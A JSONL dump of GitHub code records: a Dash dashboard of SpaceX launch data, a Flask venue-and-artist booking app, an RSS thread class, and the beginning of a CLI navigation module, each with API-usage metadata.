+{"seq_id": "15590055034", "text": "# Import required libraries\nimport pandas as pd\nimport dash\nfrom dash import html\nfrom dash import dcc\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\nimport plotly.io as pio\n\n# Set plot template\npio.templates.default = \"plotly_white\"\n\n# Read the airline data into pandas dataframe\nspacex_df = pd.read_csv(\"spacex_launch_dash.csv\")\nmax_payload = spacex_df['Payload Mass (kg)'].max()\nmin_payload = spacex_df['Payload Mass (kg)'].min()\nlaunch_sites = spacex_df.groupby(['Launch Site'],as_index=False)['Flight Number'].count()\n# Create a dash application\napp = dash.Dash(__name__)\n\n# Create an app layout\napp.layout = html.Div(style={'backgroundColor': '#F0F0F0'},\n children=[html.H1('SpaceX Launch Records Dashboard',\n style={'textAlign': 'center', 'color': '#503D36',\n 'font-size': 40,'background-color': 'rgb(255 255 255)'}),\n\n # TASK 1: Add a dropdown list to enable Launch Site selection\n # The default select value is for ALL sites\n dcc.Dropdown(id='site-dropdown',\n options = [\n {'label':'All Launch Sites', 'value':'All'},\n *[{'label': f'Launch Site : {i}', 'value': f'{i}'} for i in launch_sites['Launch Site']],\n ],\n value = 'All',\n placeholder='Enter Launch Site',\n searchable=True\n ),\n html.Br(style={'background-color': 'rgb(255 255 255)'}),\n\n # TASK 2: Add a pie chart to show the total successful launches count for all sites\n # If a specific launch site was selected, show the Success vs. Failed counts for the site\n html.Div(dcc.Graph(id='success-pie-chart'),style={'background-color': 'rgb(255 255 255)'}),\n html.Br(),\n\n html.P(\"Payload range (Kg):\",style={'textAlign': 'center','font-size': 20,'background-color': 'rgb(255 255 255)'}),\n # TASK 3: Add a slider to select payload range\n dcc.RangeSlider(id='payload-slider',\n min=0,max=10000,step=1000,\n marks={i:f'{i}' for i in range(0,10000,1000)},\n value=[min_payload,max_payload]),\n\n # TASK 4: Add a scatter chart to show the correlation between payload and launch success\n html.Div(dcc.Graph(id='success-payload-scatter-chart'),style={'background-color': 'rgb(255 255 255)'}),\n ])\n\n# TASK 2:\n# Add a callback function for `site-dropdown` as input, `success-pie-chart` as output\n@app.callback(Output(component_id = 'success-pie-chart',component_property = 'figure'),\n Input(component_id = 'site-dropdown',component_property = 'value'))\n \ndef get_pie_chart(entered_site):\n filtered_df = spacex_df.groupby(['Launch Site'],as_index=False)['class'].sum()\n if entered_site == 'All':\n fig = px.pie(\n filtered_df,\n values='class', \n names = 'Launch Site'\n )\n fig.update_layout(\n title={\n 'text': \"Successful Launches by Location\",\n 'y':.95,\n 'x':0.5,\n 'xanchor': 'center',\n 'yanchor': 'top'})\n return fig\n else:\n filtered_df = spacex_df.loc[spacex_df['Launch Site'] == entered_site]\n filtered_df = filtered_df.groupby(['class'],as_index=False)['Launch Site'].count()\n fig = px.pie(\n filtered_df,\n values='Launch Site', \n names = ['Failure','Success'], \n title = 'Total Succesful launches for ' + entered_site \n )\n fig.update_traces(textinfo='value')\n fig.update_layout(\n title={\n #'text': \"Successful Launches by Location\",\n 'y':.95,\n 'x':0.5,\n 'xanchor': 'center',\n 'yanchor': 'top'})\n return fig\n\n# TASK 4:\n# Add a callback function for `site-dropdown` and `payload-slider` as inputs, `success-payload-scatter-chart` as output\n@app.callback(Output(component_id = 'success-payload-scatter-chart',component_property = 
'figure'),\n [Input(component_id = 'site-dropdown',component_property = 'value'),\n Input(component_id = 'payload-slider',component_property = 'value')])\n\ndef get_scatter_plot(site_name,payload):\n filtered_df = spacex_df.loc[(spacex_df['Payload Mass (kg)'] > payload[0]) & (spacex_df['Payload Mass (kg)'] < payload[1])]\n if site_name == 'All':\n fig1 = px.scatter(\n filtered_df,\n x='Payload Mass (kg)',\n y='class',\n color = 'Booster Version Category',\n size='Payload Mass (kg)'\n )\n return fig1\n else:\n site_payload = filtered_df.loc[filtered_df['Launch Site'] == site_name]\n fig1 = px.scatter(\n site_payload,\n x='Payload Mass (kg)',\n y='class',\n color = 'Booster Version Category',\n size='Payload Mass (kg)'\n )\n return fig1\n\n# Run the app\nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "IamDal/SpaceX-DataScience-IBM", "sub_path": "spacex_dash_app.py", "file_name": "spacex_dash_app.py", "file_ext": "py", "file_size_in_byte": 5816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.io.templates", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.io", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 19, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 22, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 22, "usage_type": "name"}, {"api_name": "dash.html.H1", "line_number": 23, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 23, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 29, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 29, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 42, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 42, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 42, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 42, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 43, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 43, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 45, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 45, "usage_type": "name"}, {"api_name": "dash.dcc.RangeSlider", "line_number": 47, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 47, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 53, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 53, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 64, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 64, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 80, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 58, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 105, "usage_type": 
"name"}, {"api_name": "plotly.express.scatter", "line_number": 115, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 115, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 98, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 99, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "9252762045", "text": "#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom flask_migrate import Migrate\nimport sys\nimport time\nfrom datetime import datetime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom forms import *\n\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String())\n city = db.Column(db.String())\n state = db.Column(db.String())\n address = db.Column(db.String())\n phone = db.Column(db.String())\n genres = db.Column(db.ARRAY(db.String), nullable=False)\n image_link = db.Column(db.String(\n ), default=\"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\")\n facebook_link = db.Column(db.String())\n website = db.Column(db.String(), nullable=True,)\n seeking_talent = db.Column(db.Boolean, default=False, nullable=True)\n seeking_description = db.Column(\n db.String(), default='Not currently seeking for talents', nullable=True,)\n\n # 1 to Many relationship as the venue may have multiple shows,\n # that further will be distributed to upcoming and past shows\n venue_shows = db.relationship('Show', backref='venue-shows', lazy=True)\n\n # DONE:: implement any missing fields, as a database migration using Flask-Migrate\n\n\nclass Artist(db.Model):\n __tablename__ = 'artist'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(), nullable=False)\n city = db.Column(db.String())\n state = db.Column(db.String())\n phone = db.Column(db.String())\n genres = db.Column(db.ARRAY(db.String), nullable=False)\n image_link = db.Column(db.String(),\n default=\"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\")\n facebook_link = db.Column(db.String())\n seeking_venue = db.Column(db.Boolean, default=True, nullable=True)\n seeking_description = db.Column(db.String(),\n default=\"Looking for shows to perform at any place in USA!\",\n nullable=True)\n website = db.Column(db.String(), nullable=True,)\n\n # 1 to Many relationship as the artist may have multiple shows,\n # that further will be distributed to upcoming and past shows\n artist_shows = db.relationship('Show', backref='artist-shows', lazy=True)\n\n # Done: implement any missing fields, as a database migration using Flask-Migrate\n\n# DONE: Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n\n\nclass Show(db.Model):\n __tablename__ = 'show'\n id = db.Column(db.Integer, primary_key=True)\n start_time = 
db.Column(db.DateTime, nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey(\n 'venue.id'), nullable=False,)\n artist_id = db.Column(db.Integer, db.ForeignKey(\n 'artist.id'), nullable=False)\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n# SECTION HELPERS\n\n\ndef distribute_shows(venue_shows):\n upcoming_shows, past_shows = [], []\n for show_id in venue_shows:\n show_date = Show.query.filter_by(\n id=show_id.id).first().start_time\n show_date = (str(show_date).split())[0]\n show_date = time.mktime(\n datetime.strptime(show_date, \"%Y-%m-%d\").timetuple())\n if Show.query.filter_by(id=show_id.id).first().start_time > datetime.utcnow():\n upcoming_shows.append(show_id)\n else:\n past_shows.append(show_id)\n return upcoming_shows, past_shows\n\n\ndef format_artist_shows(shows):\n result = []\n for show in shows:\n temp = {}\n temp['venue_id'] = show.venue_id\n temp['start_time'] = format_datetime(str(show.start_time))\n venue = Venue.query.get(show.venue_id)\n temp['venue_name'] = venue.name\n temp['venue_image_link'] = venue.image_link\n result.append(temp)\n return result\n\n\ndef format_venue_shows(shows):\n result = []\n for show in shows:\n temp = {}\n temp['artist_id'] = show.artist_id\n selected_artist = Artist.query.get(show.artist_id)\n temp['artist_name'] = selected_artist.name\n temp['start_time'] = format_datetime(\n str(show.start_time))\n temp['artist_image_link'] = selected_artist.image_link\n result.append(temp)\n return result\n\n# SECTION Venues\n# ----------------------------------------------------------------\n\n\n@app.route('/venues')\ndef venues():\n received_venues = Venue.query.all()\n data = {}\n for venue in received_venues:\n upcoming_shows, past_shows = distribute_shows(venue.venue_shows)\n\n if venue.state not in data:\n data[venue.state] = {'city': venue.city, 'state': venue.state, 'venues': [{\n 'id': venue.id, 'name': venue.name, 'num_upcoming_shows': len(upcoming_shows)}]}\n else:\n data[venue.state]['venues'].append({\n 'id': venue.id, 'name': venue.name, 'num_upcoming_shows': len(upcoming_shows)\n })\n return render_template('pages/venues.html', areas=data.values())\n\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n search_term = \"%{0}%\".format(request.form['search_term'])\n results = Venue.query.filter(Venue.name.ilike(search_term)).all()\n response = {\n \"count\": len(results),\n \"data\": [{\n \"id\": result.id,\n \"name\": result.name,\n }for result in results]\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n venue = Venue.query.get(venue_id)\n upcoming_shows, past_shows = distribute_shows(venue.venue_shows)\n upcoming_shows, past_shows = format_venue_shows(\n upcoming_shows), 
format_venue_shows(past_shows)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n data = {}\n try:\n for key, value in request.form.items():\n if key == 'genres':\n continue\n elif key == 'seeking_talent':\n if value.lower() == 'yes':\n data['seeking_talent'] = True\n else:\n data['seeking_talent'] = False\n else:\n data[key] = value\n data['genres'] = request.form.getlist('genres')\n venue = Venue(name=data['name'],\n city=data['city'], state=data['state'],\n address=data['address'],\n phone=data['phone'],\n facebook_link=data['facebook_link'],\n image_link=data['image_link'],\n website=data['website'],\n seeking_talent=data['seeking_talent'],\n genres=data['genres'])\n db.session.add(venue)\n db.session.commit()\n flash('Venue ' + data['name'] + ' was successfully listed!')\n\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('An error occurred. Venue ' +\n data['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. 
Handle cases where the session commit could fail.\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n return None\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n artists = Artist.query.with_entities(Artist.id, Artist.name).all()\n\n data = [{'id': artist.id, 'name': artist.name} for artist in artists]\n return render_template('pages/artists.html', artists=data)\n\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_term = \"%{0}%\".format(request.form['search_term'])\n results = Artist.query.filter(Artist.name.ilike(search_term)).all()\n response = {\n \"count\": len(results),\n \"data\": [{\n \"id\": result.id,\n \"name\": result.name,\n }for result in results]}\n\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n artist = Artist.query.get(artist_id)\n upcoming_shows, past_shows = distribute_shows(artist.artist_shows)\n upcoming, past = format_artist_shows(\n upcoming_shows), format_artist_shows(past_shows)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past,\n \"upcoming_shows\": upcoming,\n \"past_shows_count\": len(past),\n \"upcoming_shows_count\": len(upcoming),\n }\n\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = {\n \"id\": 4,\n \"name\": \"Guns N Petals\",\n \"genres\": [\"Rock n Roll\"],\n \"city\": \"San Francisco\",\n \"state\": \"CA\",\n \"phone\": \"326-123-5000\",\n \"website\": \"https://www.gunsnpetalsband.com\",\n \"facebook_link\": \"https://www.facebook.com/GunsNPetals\",\n \"seeking_venue\": True,\n \"seeking_description\": \"Looking for shows to perform at in the San Francisco Bay Area!\",\n \"image_link\": \"https://images.unsplash.com/photo-1549213783-8284d0336c4f?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=300&q=80\"\n }\n # TODO: populate form with fields from artist with ID \n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID using the new attributes\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = {\n \"id\": 1,\n \"name\": \"The Musical Hop\",\n \"genres\": [\"Jazz\", \"Reggae\", \"Swing\", \"Classical\", \"Folk\"],\n \"address\": \"1015 Folsom Street\",\n \"city\": \"San Francisco\",\n \"state\": \"CA\",\n \"phone\": \"123-123-1234\",\n \"website\": \"https://www.themusicalhop.com\",\n \"facebook_link\": \"https://www.facebook.com/TheMusicalHop\",\n \"seeking_talent\": True,\n \"seeking_description\": \"We are on 
the lookout for a local artist to play every two weeks. Please call us.\",\n \"image_link\": \"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\"\n }\n # TODO: populate form with values from venue with ID \n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n data = {}\n try:\n for key, value in request.form.items():\n if key == 'genres':\n continue\n elif key == 'seeking_venue':\n if value.lower() == 'yes':\n data['seeking_venue'] = True\n else:\n data['seeking_venue'] = False\n else:\n data[key] = value\n data['genres'] = request.form.getlist('genres')\n print('-'*80)\n print(data)\n print('-'*80)\n\n artist = Artist(name=data['name'],\n city=data['city'], state=data['state'],\n phone=data['phone'],\n facebook_link=data['facebook_link'],\n image_link=data['image_link'],\n website=data['website'],\n seeking_venue=data['seeking_venue'],\n genres=data['genres'], seeking_description=data['seeking_description'])\n db.session.add(artist)\n db.session.commit()\n flash('Artist ' + data['name'] + ' was successfully listed!')\n\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('An error occurred. Artist ' +\n data['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n shows = Show.query.all()\n\n data = [{'venue_id': show.venue_id, 'artist_id': show.artist_id,\n 'start_time': format_datetime((str(show.start_time)))} for show in shows]\n for item in data:\n artist = Artist.query.get(item['artist_id'])\n item['artist_name'] = artist.name\n item['artist_image_link'] = artist.image_link\n item['venue_name'] = Venue.query.get(item['venue_id']).name\n return render_template('pages/shows.html', shows=data)\n\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. 
do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n body = request.form\n print(body)\n try:\n show = Show(start_time=body['start_time'],\n artist_id=body['artist_id'], venue_id=body['venue_id'])\n db.session.add(show)\n db.session.commit()\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('Something went wrong please try again!')\n\n finally:\n db.session.close()\n\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n", "repo_name": "3ba2ii/Fyyur", "sub_path": "starter_code/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 26, "usage_type": "call"}, {"api_name": "flask_moment.Moment", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_migrate.Migrate", "line_number": 30, "usage_type": "call"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 104, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 104, "usage_type": "name"}, {"api_name": "babel.dates.format_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "babel.dates", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": 
"flask.render_template", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.request.form.items", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 253, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 253, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 253, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 265, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 298, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 298, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 307, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 307, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 335, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 356, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 364, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 364, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 385, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 392, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 392, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.request.form.items", "line_number": 408, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 408, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 408, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 418, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 418, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 418, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 433, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 437, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 438, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 442, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 459, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 466, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 471, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 471, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 478, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 481, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 482, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 492, 
"usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 497, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 501, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 503, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 506, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 507, "usage_type": "attribute"}]}
+{"seq_id": "23163074844", "text": "\"\"\"Describe a thread working on a RSS url.\"\"\"\n\nfrom pathlib import Path\nimport threading\n\n\nfrom src.smbc import from_smbc\nfrom src.youtube import FromYoutube\nfrom src.utilities import hash_text\nfrom src.utilities import WarningContext\n\n\nclass RssThread(threading.Thread):\n \"\"\"The thread dealing with a RSS url.\"\"\"\n\n def __init__(self, url):\n \"\"\"Initialize.\"\"\"\n threading.Thread.__init__(self)\n self.url = url\n self.finished = False\n self.log_file = Path('.').resolve() \\\n / \"logs\" \\\n / f\"{hash_text(self.url)}.log\"\n print(f\"Will write in the log file {self.log_file}\")\n\n def check(self):\n \"\"\"Check if self is alive and restart if needed.\"\"\"\n with WarningContext(f\"Check thread {self.url}\"):\n print(f\"url: {self.url}\")\n print(f\"alive: {self.is_alive()}\")\n print(f\"finished: {self.finished}\")\n if self.is_alive():\n return True\n if self.finished:\n return True\n print(f\"I'm going to restart.\")\n return False\n\n def rss_write(self, text):\n \"\"\"Catch the print of the current thread.\"\"\"\n with open(self.log_file, 'a') as logfile:\n logfile.write(text)\n\n def flush(self):\n \"\"\"Implement the flush.\"\"\"\n\n def run(self):\n \"\"\"Make the work.\"\"\"\n if \"youtube.com\" in self.url:\n FromYoutube(self.url, self).start()\n if \"smbc\" in self.url:\n from_smbc(self.url)\n", "repo_name": "LaurentClaessens/hermione", "sub_path": "src/rss_thread.py", "file_name": "rss_thread.py", "file_ext": "py", "file_size_in_byte": 1520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 13, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 18, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "src.utilities.hash_text", "line_number": 23, "usage_type": "call"}, {"api_name": "src.utilities.WarningContext", "line_number": 28, "usage_type": "call"}, {"api_name": "src.youtube.FromYoutube", "line_number": 50, "usage_type": "call"}, {"api_name": "src.smbc.from_smbc", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "9288296896", "text": "from __future__ import print_function\n\nimport sys\n\nfrom ..tools import cli\n\n\n# Define version specific functions\nif sys.version_info[:2] <= (2, 7): # If Python 2.7\n user_input = raw_input\nelse:\n user_input = input\n\n\n# Commands for the interface\n\ndef _show_description():\n \"\"\"Command to show description of a node.\"\"\"\n\n current_node = cli.Node.get_current_node()\n if current_node.description is None:\n print(\"No description is available for this node.\")\n else:\n print(current_node.description)\n\n\ndef _show_commands():\n \"\"\"Command to show the commands and their descriptions for the layer\"\"\"\n\n cmds_to_display = cli.Command.get_commands()\n for name, command in cmds_to_display.items():\n print(\"- {}:\\n\".format(name))\n print(\"\\t{}\\n\".format(command.cmd.__doc__))\n\n\ndef _navigate_down_node_tree():\n \"\"\"Command to go down a level in the interface\"\"\"\n\n entries = cli.Node.get_entries()\n current_node = cli.Node.get_current_node()\n node_count = len(current_node.children)\n if node_count != 0:\n if node_count == 1:\n entries.append(list(current_node.children)[0]) # Go to the only option available\n else:\n _give_node_options(current_node.children, entries)\n else:\n print(\"There are currently no options to choose 